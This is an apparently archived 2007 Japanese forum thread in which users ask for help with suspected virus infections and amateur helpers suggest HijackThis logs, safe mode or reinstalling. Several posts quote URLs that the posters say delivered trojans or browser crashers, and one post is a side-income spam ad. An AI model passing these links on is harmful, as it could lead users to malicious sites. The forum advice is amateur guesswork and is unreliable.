【ウイルス】と思ったら書き込みを【解決】

このエントリーをはてなブックマークに追加
1まちがって名前消しちゃいました。
えっとよ、いきなり糞スレ立てて申し訳ないが、ちょっと聞いてくれ。
ie_updater.exe
ってなに?ウイルス?
2まちがって名前消しちゃいました。:2007/03/29(木) 01:10:48 ID:???
ただの単発スレか
それらしいスレタイでごまかそうとするな、ゴミクズ
3まちがって名前消しちゃいました。:2007/03/29(木) 08:39:47 ID:KtB3G4pF
ie_updater.exeはスパイウェアみたいだぜ。1さんよ。
4まちがって名前消しちゃいました。:2007/03/29(木) 14:47:28 ID:WhX3xWru
サポート掲示板からきた者です。
俺は結構ウイルスなどに詳しいので、
不安なことがあったら書き込んでください。
5まちがって名前消しちゃいました。:2007/03/29(木) 21:22:09 ID:???
1時間ごとに〜時だよっていうやつ
ウイルスかな?

64 ◆NFQtmGW3bw :2007/03/29(木) 21:44:36 ID:hMdBKcj7
>>5
そんなんあるの?初めて知った。それはどういう風に表示されるの?
75:2007/03/29(木) 21:49:13 ID:rls6f0By
スピーカーから男の声でぴっぴっぴっ9時だよって流れる
9時丁度に
そろそろ10時だからまた来るかも
84 ◆NFQtmGW3bw :2007/03/29(木) 21:50:52 ID:???
>>7
HijackThisとかわかる?それのログうp希望
95:2007/03/29(木) 21:52:21 ID:rls6f0By
すいません
わかんないです

104 ◆NFQtmGW3bw :2007/03/29(木) 21:53:25 ID:???
115:2007/03/29(木) 21:55:36 ID:rls6f0By
ログとってみます
124 ◆NFQtmGW3bw :2007/03/29(木) 21:56:48 ID:???
お願いします。わからんかったらゴメンね
135:2007/03/29(木) 21:59:16 ID:rls6f0By
英語orz
無理かも
144 ◆NFQtmGW3bw :2007/03/29(木) 21:59:58 ID:???
ガンガレ
155:2007/03/29(木) 22:01:43 ID:rls6f0By
p2p止めたら来なかったかも
164 ◆NFQtmGW3bw :2007/03/29(木) 22:03:55 ID:???
p2pは止めたほうがいいよ。
175:2007/03/29(木) 22:05:59 ID:rls6f0By
ホントすいませんorz
手間をかけてしまって
止めるようがんばります
184 ◆NFQtmGW3bw :2007/03/29(木) 22:07:17 ID:???
p2pはマジでやばいから止めるべき。頑張ってください。
19まちがって名前消しちゃいました。:2007/04/05(木) 19:23:30 ID:97qx+xhM
ウイルスを検知しましたが処理しました。ご安心下さい。とでたんだがどうすればいいですか?
204 ◆NFQtmGW3bw :2007/04/05(木) 20:06:12 ID:???
>>19
それなら大丈夫なはずです。
ソフトがウイルスを削除してくれたはずです。
安心してください。
21まちがって名前消しちゃいました。:2007/04/10(火) 22:18:21 ID:UP8glvhQ
なんかメールから「P2Pばっかやってないでやきそばくえ」みたいなのがきて
かんじへんかんできなくなったり、ぷろぐらむがひらけなかったり、ファイルがかってにJPEG
にされたりしたんですがどんなウイルスなんですか?
たいさくもおしえてください。
22まちがって名前消しちゃいました。:2007/04/12(木) 12:43:41 ID:???
>>21
知らんけどリカバリでもしとけば?
23まちがって名前消しちゃいました。:2007/04/12(木) 14:19:25 ID:???
P2P触ったのは認めます。
普段と違う感じがして何か危ないと思ったのでシャットダウンして、その後すぐ起動したら、ご迷惑を…の画面でした。
キーボードが反応しなくて選択の余地がないんで、さっきから延々繰り返しです…
神様お願いします。
244 ◆NFQtmGW3bw :2007/04/12(木) 19:27:46 ID:???
>>23
P2Pウイルスとかはまだ見つかってないのとかあるからマジでやばいよ。
とりあえずHijack Thisのログ・・・は取れないかな?
セーフモードも起動できない?
25まちがって名前消しちゃいました。:2007/04/12(木) 21:18:18 ID:???
>>24=神コロさま
キーボードのUSBを抜いたら起動できました。スパイボットでいくつか駆除して、起動の際に一瞬出てきてたブルースクリーンは出なくましたが、ご迷惑を〜の画面は相変わらず出てきます。
しかし悪いことに、DELキー押していろいろ触ってしまったためか、windows読み込み中で必ずフリーズしてしまい、文字通り私もフリーズです0TL
策はありますでしょうか?
26まちがって名前消しちゃいました。:2007/04/13(金) 17:38:36 ID:???
27まちがって名前消しちゃいました。:2007/04/14(土) 12:20:51 ID:FEj8FyVX
ローカルDにDroiDieという名前の意味不明なファイルとチョン語のファイル
(2つともチェスの駒のナイトみたいな形のファイル)が湧いてきて困って
います。むやみに削除しても大丈夫でしょうか?
284 ◆NFQtmGW3bw :2007/04/14(土) 14:17:51 ID:???
>>25
そうなったらそれはシステムの故障とかそういう可能性もあるので、俺じゃわからないです。すいません。
フリーズしたままで暫く置いといたらどうですか?まあそれで無理なら俺はお手上げです。

>>27
また新種っぽいな。
まあまだわからないけど、P2Pとかやってる?
後、そうなる前にした操作や変なこととかあったら言ってください。
29まちがって名前消しちゃいました。:2007/04/14(土) 15:32:11 ID:FEj8FyVX
>>27
トレント使って欲しいファイルはダウンロードしています(アニメやゲームROMなど)
。その際市販のウイルスバスター(デジターボのウイルスドクター)を使用しています。
スキャンしてもウイルスは発見されませんでした。しかし今でも少しずつ
増殖しています。
304 ◆NFQtmGW3bw :2007/04/14(土) 18:26:32 ID:???
>>29
馬鹿だなぁ。P2Pはホント駄目だって。
まあこれに懲りてP2Pは止めましょう。

とりあえずタスクマネージャとかの画像も欲しいところですね。
アップお願いします。
31まちがって名前消しちゃいました。:2007/04/14(土) 20:03:36 ID:FEj8FyVX
ユーザー名の都合上画像はアップできませんが起動プログラムは、
sistem idle proce/system/troi die kxp/kvwsc exe/smss exe/k reg ex exe/
kvmonxp_1 exe/carpserv exe/uihost exe/kv srv xp exe/isass exe/msmsgs exe
/ico exe/actrotray exe/ati2evxx exe/apnt ex exe/conime exe
/svchost exe/alg exe/ctfmon exe/daemon exe/ez sp_px exe/winlogon exe/
atiptaxx exe/hk wnd exe/apoint exe/wuauclt exe/kvfw exe/bit comet exe
明らかに安全なやつは除いてあります。使用率の重い順です。
324 ◆NFQtmGW3bw :2007/04/14(土) 20:08:08 ID:???
troi die kxp
がおそらく関係してると思う。こりゃ多分新種かなんかの亜種だな。

俺じゃ手に負えんので、アダ被で質問してみてくれ。
33まちがって名前消しちゃいました。:2007/04/16(月) 20:20:46 ID:???
>>28
フリーズ放置も全く効果ナシでした…
特に大事なものを保存してるわけでもないので、どうしようもなければもういっそ初期化したいとも思ってますが、パスワードが必要になったりしますか?全く覚えてないんです。
携帯から何度も長々とすみません。次にPC触ったらあれこれ調べてみたいと思います。ありがとうございます。
3433:2007/04/16(月) 22:08:56 ID:???
パソコン一般板の超初期化質問スレに移動してみます。マルチになっちゃいますので、こちらはスルーお願いします。
いろいろとありがとうございました。
35まちがって名前消しちゃいました。:2007/04/28(土) 04:44:21 ID:qXNRH5T7
ウイルスに感染してPCでネットできないのですが、どぉしたらいいかな…
カスペルスキー5でスキャンしてもウイルス削除できませんってでるorz
助けて…
364 ◆NFQtmGW3bw :2007/04/28(土) 12:41:31 ID:???
>>35
う〜ん、本当にウイルスなんですかね?
何でウイルスだとわかるんですか?
37まちがって名前消しちゃいました。:2007/04/28(土) 14:13:12 ID:CdSSDBiB
仕事で残業代もでない!
忙しくて他のことをする時間がない。でも・・・・
【簡単】にできる仕事で、副収入が欲しい。
私はそんな時、偶然、あるHPからこのビジネスに出会いました  
パソコンで【好きな時間】に誰でもできる安心なお仕事です!
パソコンがない方でも、主婦の方でも簡単にできる仕事です。    
毎月頂ける副収入に本当に感謝しています。堅実な人におすすめ☆   
一度このサイトを見てください。

詳しくはこちら↓

http://a★n.to/?mt
※URLの★マークを消してね。
384 ◆NFQtmGW3bw :2007/04/30(月) 08:43:48 ID:???
http://www30.atwiki.jp/virus2007jp/
こっちに移転します。
39まちがって名前消しちゃいました。:2007/06/04(月) 22:09:26 ID:yWLz2go1
すみません、ウイルス踏んだっぽいので教えて欲しい事が有ります。

*ウイルス注意
http://suzukiairi.net/cgi-bin/up/img/puniairi150.jpg

というリンクを踏んだ所、

Source: C:\Documents and Settings\Ryan T\Local Settings\Temporary Internet Files\Content.IE5\1W9XZX5R\puniairi150[1].jpg
Click for more information about this risk : PHP.Backdoor.Trojan
Action taken: Repair failed
Action taken: Access denied

というメッセージが、半年前に期限の切れたノートンから出ました。
このトロイ"PHP.Backdoor.Trojan "について調べた所、セキュリティーの
脆弱性を上げるだけ…みたいな事が書いて有ったのですが、(つまり
ファイルを削除する類では無い?)HDDから音がして急激に空きスペース
が増えていきました(慌てて電源を切ったので、空きスペースの増加範囲は
300MB程でした)。

以上の事から、なんらかのファイルが削除されたと考えますが、何のファイル
が削除されたか知りたいのです。具体的には、この手のプログラムがどの
フォルダからアイテムの削除を行っていくのかを知りたいのですが、助力
願えませんか?
40まちがって名前消しちゃいました。:2007/06/04(月) 22:52:05 ID:Ptn+jvzz
頭の良い強者な方、教えて〜。
間抜けな事に地雷を踏んでしまい、ウイルスに感染してしまった様で、パソ立ち上げると、デスクトップまで立ち上がるのですが、砂時計が出たままで、操作不能となってしまいました。(ポインタは動きます)
再セットアップは最終手段ですが、データ消去せず済む様な方法があれば教えて下さい。
ご教授の程、お願いします。
41まちがって名前消しちゃいました。:2007/06/05(火) 02:54:22 ID:zeS0GG3u
>>40
セーフモードでもむり?
42まちがって名前消しちゃいました。:2007/06/05(火) 16:20:05 ID:SQGOmWjx

はじめましてPC初心者です。今朝出会い系サイトでこれをクリックしたらウィンドウが閉じてしまいその後ハード、PCをクラッシュさせるだのと・・・ウィンドウに出ました
対処法とか今後何らかの支障が出るのか・・・今のところは何とか無事なんですが
どうすればよいのかわかりません(><)誰か教えてください。
このURL↓前の部分は欠落してるかも知れません。

96ab316f09d7a3d82ec47467d54699ee-h.iu089u.info/
43まちがって名前消しちゃいました。:2007/06/05(火) 16:22:17 ID:SQGOmWjx
42の者です。補足ですがウィルスソフトはソースネクスト使ってます。
宜しくお願いしますm(__)m
44まちがって名前消しちゃいました。:2007/06/05(火) 16:28:35 ID:SQGOmWjx
更に追加です これがそのページでした(><)

http://96ab316f09d7a3d82ec47467d54699ee-t.iu089u.info
96ab316f09d7a3d82ec47467d54699ee
[url]http://96ab316f09d7a3d82ec47467d54699ee-b1.iu089u.info[/url]
[url=http://96ab316f09d7a3d82ec47467d54699ee-b2.iu089u.info]
96ab316f09d7a3d82ec47467d54699ee[/url] [u]
http://96ab316f09d7a3d82ec47467d54699ee-b3.iu089u.info[/u]
05c0c9a6b483684e6b2a117816eb27d8
45まちがって名前消しちゃいました。:2007/06/05(火) 17:29:27 ID:???
答える方にウィルス踏んで確かめろというのかいお前さん
46まちがって名前消しちゃいました。:2007/06/05(火) 19:40:21 ID:J4pfSAtx
えっ?(^^;  そんなわけじゃないいですけど…
どうすればいいんでしょうか?
ひょっとして…この先クラッシュするような事あるんでしょうか?
47まちがって名前消しちゃいました:2007/06/06(水) 03:22:14 ID:???
先程海外のサイトを回っていた所、
急にインターネットエクスプローラーに不具合が生じ、
終了してしまうという症状が発生しました。

新しく、インターネットエクスプローラを開いて、日本語サイトを見ても
幾らか時間が経つとまた同じ症状が出て、終了されては開き、
終了されては開き、の繰り返しです。

原因として心当たりがあるのは、検索結果の中にまぎれていた
成人向け海外サイトを踏んだことです。

どなたかアドバイスお願いします。
48まちがって名前消しちゃいました。:2007/06/06(水) 07:04:32 ID:BLoFRCTF
セーフモードで最悪な事態は回避出来そうです。
少し焦り、基本的なセーフモードまで、頭が廻りませんでした。
これで何とか、データ回避とシステム修復してみます。
当面、ここを頼らず頑張ってみますが、分からない事あればお助けお願い致します。
有り難う御座いました。
49まちがって名前消しちゃいました。:2007/06/06(水) 16:21:00 ID:HknZuZkf
40さんと同じ症状に・・。
セーフモードで起動し、クッキーとインターネットキャッシュの削除、
Cドライブのエラーチェックをしてみましたが、改善しませんでした。

再インストールしかないのかな、とも思うのですが、
データ全削除はちょっと辛いので、その前にこれをやっておけ!
みたいなことがありましたらご指導のほど、お願いします。

通常起動したときに、タクスマネージャだけは正常に作動するようなので、
必要であれば作動しているアプリケーションなども列挙いたします。

どうぞ、よろしくお願いします。
50まちがって名前消しちゃいました。:2007/06/06(水) 16:30:14 ID:???
リ カ バ リ
51まちがって名前消しちゃいました。:2007/06/06(水) 19:56:50 ID:BLoFRCTF
40の者で、復旧方法でなく申し訳ないが、立ち上げの際、ウィンドウズ ユーザー メッセンジャーでエラーが出て、通常時のデスクトップのアイコンは出てるが動作しない、タスクバーのスタートも動作しないので、立ち下げる事も出来ない。。
(選択すると砂時計で、待てども、そのまま)
セーフモードでは、それらは可能。
52まちがって名前消しちゃいました。:2007/06/06(水) 23:21:49 ID:wvoddf8s
マジでタスクマネージャーの画像やhijackthisのログをあげないと答えるほうも話しにならんだろ。
全員OS再インストールだな
53まちがって名前消しちゃいました。:2007/06/07(木) 19:22:53 ID:UE1aeIv2
※間違いでした。

ウィンドウズ ユーザー メッセンジャー ×

ウィンドウズ ユーザー マネージャー ○
54まちがって名前消しちゃいました。:2007/06/07(木) 19:47:36 ID:ziW4+2eo
つーかウイルスって何?
55まちがって名前消しちゃいました。:2007/06/08(金) 14:05:56 ID:???
>>54
個々のパソコンに悪さをするプログラム。

製作者は一様に小学生の頃好きな娘の縦笛を舐めた事のある経験者という。
56まちがって名前消しちゃいました。:2007/06/10(日) 11:34:25 ID:R2E/G1uk
PC起動時にRemote Procedure Call(PRC)が異常終了しましたというメッセージが出て強制的にシャットダウンしてしまいます。どうらやらブラスタというウィルスらしいのですが、セーフモードにてアンチウィルスでスキャンしても駆除できません。
57まちがって名前消しちゃいました。:2007/06/10(日) 12:17:37 ID:F8PTQS7Y
最近たまにネットを見ているとウインドウが勝手に閉じてしまいます。
何故でしょうか?
もしかしてウイルスでしょうか?
どうやったら解決出来ますか?教えて下さい
58まちがって名前消しちゃいました。:2007/06/10(日) 17:37:34 ID:g4AI/Rzp
最近XPパソコンが重くなってきたので、
ウィルスのせいだと思い、
高い金を出してウィルスバスター2007 三年版を入れました。

しかし直るどころか、
余計重くなってしまいました。
風邪をこじらせてしまったのでしょうか?

もの凄く動作が遅く、
ストレスを抱える日々で辛いです。

別のウィルス対策ソフトを入れれば直りますか?
助けて下さい。
59まちがって名前消しちゃいました。:2007/06/10(日) 18:17:57 ID:OQEqYZXz
>>58
メモリ増設か最小限の構成で再インストール
60まちがって名前消しちゃいました。:2007/06/10(日) 21:46:43 ID:UcdzXUsL
・パソコン使用者が涼宮ハルヒになってる
・使っていると赤い泡みたいなので画面が覆い尽くされる
・「システム管理者によって制限されている」みたいなことを言われて、色々操作できない

どうやったら解決できますか?
61まちがって名前消しちゃいました。:2007/06/10(日) 23:47:41 ID:???
PC操作してないのに勝手に操作されて
ブラウザとか開いたりアンインストールとかされたんだけど
もう一度PCつけたらなんともなかったんだけど
一体なんだったのか教えてください
62まちがって名前消しちゃいました。:2007/06/11(月) 01:35:32 ID:3xugTUHP
PCたちあげたらドクロが表示されて動かせない...ORZ
63まちがって名前消しちゃいました。:2007/06/12(火) 05:17:53 ID:6wcuABuO BE:158781762-2BP(5555)
PHP.Backdoor.Trojanに感染してしまって今ノートンでウィルスチェックをしているところです。
このウィルスはどんな悪さをするのか、詳しい人がいましたら教えてください。
64まちがって名前消しちゃいました。:2007/06/12(火) 07:05:59 ID:???
>>63
http://aol.okwave.jp/qa2820832.html

PHP.Backdoor.Trojanで検索すれば沢山でてきます
65まちがって名前消しちゃいました。:2007/06/12(火) 08:31:26 ID:???
まぁ今ツレから電話で
「ウイルスに感染したっぽい、殺人鬼 スクリーンセーバーってのがでたり
結婚式とかオレンジってファイルがある」
ってことでちょい見に行くんだが
もし本当だったら新種かな?もし新種じゃなかったら
検索で引っ掛けれない俺のヘタレをさらしたようなもんだな....ORZ

一応 Share常習だから P2Pだろうなと予想。
66まちがって名前消しちゃいました。:2007/06/12(火) 19:08:19 ID:??? BE:264636645-2BP(5555)
>>64
有難うございました。
6739:2007/06/12(火) 19:35:52 ID:VSq4aoMg
>>64

上の方で同様の質問をした者です、ありがとうございました。
68まちがって名前消しちゃいました。:2007/06/12(火) 19:47:15 ID:50JO99TR
開いたら女の子の画像。
同時にフロッピーがガーガー鳴った。
ウイルスなのでしょうか?

4 :名無しさん@恐縮です:2007/06/12(火) 15:31:42 ID:lNCTHN3t0
http://hey.chu.jp/up/source3/No_2471.jpg
69まちがって名前消しちゃいました。:2007/06/12(火) 20:11:16 ID:cicYASxm
>>68 何のウイルスでしょうか?手当てしないとダメでしょうか
70まちがって名前消しちゃいました。:2007/06/13(水) 14:49:08 ID:???
>>68
怖くて開けない・・・
71ウィルス:2007/06/14(木) 14:02:51 ID:IbfUh+8J
あのパソコンに詳しい方に聞きたいのですが…
パソコンを開いたときに背景の色が変わっていたのですが勝手に変わるって
ことはありますか?ウイルスかなんかでしょうか?
その後Nortonと言うセキュリティを設定したのですが問題はなかったのですが
ウィルスが潜んでる事とかあるんですか?素人なのですみません…
72まちがって名前消しちゃいました。:2007/06/14(木) 23:32:27 ID:N6IwRv8/
親父のPCが電源つけて起動させようとしたら女の声で「キーボードなんかムカツクー」(?)
という音声がリピートされるだけでOS起動まで行かなかった。
どうすれば良いでしょうか?
それともおとなしく諦めてもらうかな
73まちがって名前消しちゃいました。:2007/06/15(金) 00:18:57 ID:???
なんじゃそら
74まちがって名前消しちゃいました。:2007/06/15(金) 10:51:23 ID:mCiBdnte
FC2ブログのランキングをクリックしたらウイルスに感染した!
FC2は結構危険なのか?
誰か他にもFC2でウイルスに感染した人いる?
75まちがって名前消しちゃいました。:2007/06/16(土) 05:24:11 ID:fvzDN5Sh
急に血しぶきみたいなのが出てきて
それに画面が覆いつくされて、慌てて再起動したんですが
起動してもWINDOWS〜がどうたらこうたらで
アプリケーションが使えなくなりました。
Cドライブを見ると明らかにいろいろなくなってる・・・
何なんでしょうか。
どなたか詳しい方いらっしゃいませんか?
76 ◆1F05ZZGYb2 :2007/06/16(土) 08:48:34 ID:???
このスレ開いたとたんにセキュリティーソフト反応するんだが・・。
774 ◆NFQtmGW3bw :2007/06/16(土) 11:21:39 ID:???
長い間ルスにしてる間に凄いレスがついてるなあwww 

一人一人わかる程度で教えていきましょう!
78まちがって名前消しちゃいました。:2007/06/16(土) 17:13:10 ID:HOfpynNu
電源入れたら、いつも通りwindowsが立ち上がらなくて、

青い背景に「IF なんとかセーフモード とか、F8スペースなんとか」

っいう英語で書かれた文章しか画面に映らなくなってしまったんですけど、
どうすれば良いのですか?
794 ◆NFQtmGW3bw :2007/06/16(土) 19:47:11 ID:???
>>78
なんとかじゃわからないので、その文章を全文載せてください。

ちなみにこちらはそろそろ使用を中止しますので、

http://www30.atwiki.jp/virus2007jp/

に来て下さい。
80まちがって名前消しちゃいました。:2007/06/16(土) 20:47:34 ID:HOfpynNu
If problems continue disable or remove any newly installed hardware or soft ware.

Disable BIOS memory options such as caching or shadowing.

If you need use safe mode to remove or disable components,

restart advanced startup options,
and then select safe mode.
↑でした。
セーフモードを選び、立ち上げると、またこの英語の画面が現れます。
814 ◆NFQtmGW3bw :2007/06/16(土) 21:26:32 ID:???
>>80
その下のほうに更に 0なんとかって奴もありませんでした? 

あと、さっきのアドレスのほうの掲示板に書き込んで欲しいです。
こっちは見てないので。お願いします。
82まちがって名前消しちゃいました。:2007/06/16(土) 23:46:17 ID:???
ありがとございます

(0000.0000.………)
みたいなものがありました
パソコン使えなくて、携帯からしかそのサイト見れないんですけど、書き込みの仕方がわかりません(_ _)
83まちがって名前消しちゃいました。:2007/06/17(日) 00:08:25 ID:???
そのサイトに携帯から書き込むことができましたm(_ _)m


失礼しました。
844 ◆NFQtmGW3bw :2007/06/17(日) 09:15:29 ID:???
ttp://jbbs.livedoor.jp/computer/36907/
どこに書き込んでくれました?

あと、0000の全文と0000の前に書いてある文章を教えてください。(携帯などで画像を撮ってくれても貼ってくれてもいいです)
85まちがって名前消しちゃいました。:2007/06/17(日) 11:16:46 ID:???
一覧の
掲示板/コメント/2

という所に書込みました。
続きの英文は

Technical information

stop:0x000000ED (0x80F1E850,0xc0000006,0x00000000,0x00000000)

でしたm(_ _)m
864 ◆NFQtmGW3bw :2007/06/17(日) 14:01:54 ID:???
>>85
自分も悪いけどよくわからなかったので、下記のサイトを見てみてください。
ttp://winxp.pasokoma.jp/9_276114.html
87まちがって名前消しちゃいました。:2007/06/17(日) 16:59:24 ID:???
ありがとございますm(_ _)m

今度パソコンが使える環境で、そのサイトを見たいと思います。
88まちがって名前消しちゃいました。:2007/06/17(日) 21:54:02 ID:???
誰か助けてorz今の状態は…パソコン買って一ヶ月程。家族で使用。みんな初心者。
ノートンが入っていて初めてスキャンしてみたらTracking Cookieというウィルス?に感染していると表示されました。
みんなで使っているのでどこで感染したのかはよくわからないです。ファイルの特定の仕方?とかもよくわからない素人集団なんで分かりやすく教えて貰えると嬉しいです;;
スキャンして問題の解決選んでも何度も引っ掛かって途方にくれています;
89まちがって名前消しちゃいました。:2007/06/17(日) 23:56:30 ID:???
>>88
Tracking Cookieはそんなに神経質にならなくて大丈夫だと思うよ
いろんな意見や考え方があるけど、気になるならこれを参考に・・・

http://www.google.co.jp/search?rlz=1B2RNFA_jaJP214JP216&hl=ja&q=Tracking+Cookie%E3%81%A8%E3%81%AF&btnG=Google+%E6%A4%9C%E7%B4%A2&lr=
90まちがって名前消しちゃいました。:2007/06/18(月) 01:48:40 ID:???
ありがとうございます。
妹から興味あって変なページ一回だけ行っちゃったと言われたんですが特に気にしなくても大丈夫ですかね?明日ゆっくりページ見てみますが出来れば早く安心させてあげたいのでもしわかるようならお願いします
91まちがって名前消しちゃいました。:2007/06/18(月) 08:16:29 ID:???
メールが勝手に送信され続けるのですが、ウイルスですか?

ウイルススキャンしても感染が見つかりません。
詳しい方、対処法のご教授願います。
924 ◆NFQtmGW3bw :2007/06/18(月) 08:20:20 ID:???
>>91
ウイルス、スパイウェアの可能性があります。
できればHijack Thisのログ、タスクマネージャの画像など貼り付け願います。
934 ◆NFQtmGW3bw :2007/06/18(月) 08:21:17 ID:???
http://jbbs.livedoor.jp/computer/36907/
今度からは上のアドレスに書き込んでください。お願いします。
94まちがって名前消しちゃいました。:2007/06/19(火) 18:18:27 ID:???
ADSLなんだけど、通信状況見てみたら最近異様に送信が多かった。
で、タスクマネージャーで怪しいタスク調べたら、
Spoolsvc.exe
Isass.exe
ってのがあったからググって見たらどっちもワームっぽかった。
タスクを殺してファイルも消してみた。
無事再起動したし、無駄な通信もなくなった。
ので一応報告してみる。
954 ◆NFQtmGW3bw :2007/06/19(火) 18:32:09 ID:???
>>94
ttp://jbbs.livedoor.jp/computer/36907/
上のアドレスにお願いします。
あと、上のアドレスにHijack Thisのログを貼って欲しいです。

お願いします。
96まちがって名前消しちゃいました。:2007/06/22(金) 17:42:30 ID:UTbKRHl1
原田ウイルスって解除方法ってあるの?
97まちがって名前消しちゃいました。:2007/06/22(金) 18:19:32 ID:IbOHhvK0
ネットやってて電源がいきなり落ちてそれから電源がつかなくなってしまいました、これはウィルスなのでしょうか?
98まちがって名前消しちゃいました。:2007/06/22(金) 18:42:05 ID:???
熱暴走じゃね?
99まちがって名前消しちゃいました。:2007/06/22(金) 21:01:50 ID:IbOHhvK0
熱暴走と申しますと、どうすれば直りますでしょうか、なにぶんアナログ人間なので申し訳ありません
100まちがって名前消しちゃいました。:2007/06/22(金) 21:45:24 ID:???
あまりにも情報が少なすぎるから、熱暴走とは断定出来ないけど。
仮に熱暴走だとしたら、
簡単に言うとPCが熱くなって落ちちゃったって事。
エアコンや扇風機で、熱がこもらないようにすればいい。
PC内部にホコリが溜まってても熱暴走しやすい。
101まちがって名前消しちゃいました。:2007/06/22(金) 23:59:22 ID:1+oYxbXL
102まちがって名前消しちゃいました。:2007/06/23(土) 02:24:51 ID:MkBUxa9O
100さん、ありがとうございます
1034 ◆NFQtmGW3bw :2007/06/23(土) 08:45:55 ID:???
>>101
アドレス見ただけでわかっちゃいましたが、それはブラクラじゃないですか?
104まちがって名前消しちゃいました。:2007/06/23(土) 15:58:21 ID:???
別なスレでお世話になった方がいたら申し訳ありません。
トロイというものがよく分からないのですが、どうやら感染してしまったようです↓↓対処法は無しなのでしょうか…知っている方、どうか教えて下さい。
1054 ◆NFQtmGW3bw :2007/06/23(土) 16:45:01 ID:???
>>104
教えてあげますが、こちらはあんまり見てないので、
ttp://jbbs.livedoor.jp/computer/36907/
に書き込みお願いします。
106まちがって名前消しちゃいました。:2007/06/23(土) 17:11:21 ID:???
ありがとうございます。゜( ´Д`)゜。

今パソコン使えないのでもう少ししたら書き込みます。よろしくお願いします。
107まちがって名前消しちゃいました。:2007/06/26(火) 01:07:16 ID:lYkU4Dhk
528 :以下、名無しにかわりましてVIPがお送りします。:2007/06/26(火) 00:10:16.92 ID:ajcVZagx0
ttp://space-town.net/~vipper/love/nami.jpg
これで抜いた俺は勝ち組なのか負け組なのか
マナカナかわいいよマナカナ


↑を踏んでしまいさっきからOUTLOOKが沢山起動して困ってます
メーラーにJASRACKがどうたらと本文がかかれてます
他人のPC借りてるんで心配です
どうしましたらいいですか?
1084 ◆NFQtmGW3bw :2007/06/26(火) 13:13:55 ID:???
>>107
う〜ん、こりゃ凄いwww
どうやら、危ないURLに自動的に移動するようになってるみたいですね。
今の症状を教えてください。
109まちがって名前消しちゃいました。:2007/06/26(火) 13:24:43 ID:bL4PD9E+
iTunesをいじっていたら急に画面が真っ青になったのですが。。
110まちがって名前消しちゃいました。:2007/06/26(火) 13:27:37 ID:lYkU4Dhk
>>108
メーラーのOUTLOOKが永遠に起動して
本文にカスラックです音楽の著作権を何たらかんたらって表示されてました
スパム発信のウイルスでしょうか?

再起動してからは特に反応も見られません
メーラーの送信ボックスも変化は見られないので送信されて無いと見ていいでしょうか?
1114 ◆NFQtmGW3bw :2007/06/26(火) 14:07:51 ID:???
>>109
本当ですか?本当だとしたら、もうやばいですね。そこの会社さん。
この前もなんか爆発したとか言ってましたしね。

>>110
多分大丈夫だと思いますよ。
メールストームとかのブラクラを踏んでしまっただけだと思いますが、
気になるなら、オンラインスキャンなり、して見るといいと思います。

今後は怪しいアドレスは開かないようにしましょう。
112まちがって名前消しちゃいました。:2007/06/27(水) 00:28:55 ID:41dplf0W
>>111
110ですありがとうございます
113まちがって名前消しちゃいました。:2007/06/27(水) 00:57:20 ID:???
はじめまして。

avast! 4 Home Editionを利用中にトロイが検索されてしまいました。

昨日までノートンを入れていたのですが昨日検索した時は何も出ず
その後、ノートンをアンインストールしてavastをインストールして検索したところ

トロイが見つかりました。
でこのavastでウィルスの検索している最中に電源が勝手に落ちてしまいます。

何故でしょうか??
教えて下さいませ。
1144 ◆NFQtmGW3bw :2007/06/27(水) 14:08:18 ID:???
>>113
どう考えてもウイルスによる強制終了が行われてるようです。
セーフモードでやって見て、できなければ、Hijack Thisのログをお願いします。
115113です。:2007/06/27(水) 16:48:09 ID:???
>>114さん。


コメント有難うございます。
セーフモードでは下記の行いをしたら宜しいのでしょうか??
素人でさっぱり分かりません。
お願いします。

1)一度電源オフ
2)セーフモードで起動(メーカロゴが出たら、F8を軽く何度かたたく、5〜6回)
3)セーフモードとネットワークを選んで起動、VGAモードなので画面が普段と違う
4)システム復元を無効にする
 スタート〜コントロールパネル〜パフォーマンスとメンテナンス〜システム〜システムの復元
 「システムの復元を無効にする」チェック入れる
5)IEを起動し、Cookieやキャッシュを消す
1164 ◆NFQtmGW3bw :2007/06/27(水) 18:00:45 ID:???
>>115
まあ、とりあえずそれはやって、ついでなので、Hihack Thisのログもとってください。
117まちがって名前消しちゃいました。:2007/06/27(水) 18:49:49 ID:???
えっとキーロガーを踏んだかどうかはどこでわかりますか?

先日いろいろ怪しいファイルをダウンロードしたんですが、
どうやらそのファイルにはキーロガーが入っているとか聞いて。

調べたらある掲示板に
「モデムの'DATA'が点滅していたらかかってる可能性あり」と書いてあり、
見てみたらかなり頻繁に点滅していました。
でもだいぶ前(パソコンを買った当初)から点滅していたような気もします。

可能性じゃなくて確実に見分ける方法はありませんか?
118113:2007/06/27(水) 19:17:39 ID:???
>>116


ログをとりました。
この後どうすればよろしいのでしょうか??
119まちがって名前消しちゃいました。:2007/06/27(水) 20:16:01 ID:???
スカイプをやっていたときにウィルスのようなファイルを開いてしまいまして、
PCを起動し、デスクトップ画面が表示されると、

「rundll32.exe-DLL初期化の失敗
ウィンドウステーションがシャットダウン中であるため、アプリケーションが初期化に失敗しました」

という表示がされ、再起動が行われる。という状態が繰り返し行われ、パソコンが使えない状態になっています。

復旧するにはどうしたらよいでしょうか。

どなたか助言の方、よろしくお願いします。

マルチ失礼します。
120まちがって名前消しちゃいました。:2007/06/28(木) 03:09:59 ID:BfbXrYvv
自分のパソコンが素人目にみてもアウトなのですが初期化のやり方を教えて下さい。
121とうりすがりの受験生:2007/06/28(木) 04:10:34 ID:???
>>120

メーカーパソコンだったら、リカバリーCDがあると思うのでそれをドライブにいれて画面の指示にしたがうだけ。
この時うまくCDブート出来なかったらまた来なされ( ̄〜 ̄)ξ
データのバックアップをお忘れなく
122まちがって名前消しちゃいました。:2007/06/28(木) 09:44:05 ID:BfbXrYvv
>>121
ありがとうございます、助かります。

あと、データが全部消えてctrl+art+deleteがどうたらで調べたら初期化しないとダメらしいので、データのバックアップは取れないと思います。
お気遣い感謝します。
1234 ◆NFQtmGW3bw :2007/06/29(金) 16:36:41 ID:???
>>118
ttp://jbbs.livedoor.jp/computer/36907/
こっちに貼り付けお願いします。
1244 ◆NFQtmGW3bw :2007/06/29(金) 18:37:02 ID:???
>>117
ttp://cowscorpion.com/Antispy/KLDetector.html
これで検出できるみたいですよ。
あと、確かHijack Thisのログでもわかったような覚えがあります。
125中国:2007/06/30(土) 23:04:30 ID:???
ここ2週間、中国ウィルスと戦ってます。
どんなに削除しても

http://www.puma166.com/1.htm

ここにアクセスして、再感染してしまいます。
ウイルスバスターでも、対応できないです。

どうしたらよいでしょうか?どなたか助けてください。
1264 ◆NFQtmGW3bw :2007/07/01(日) 08:21:07 ID:???
>>125
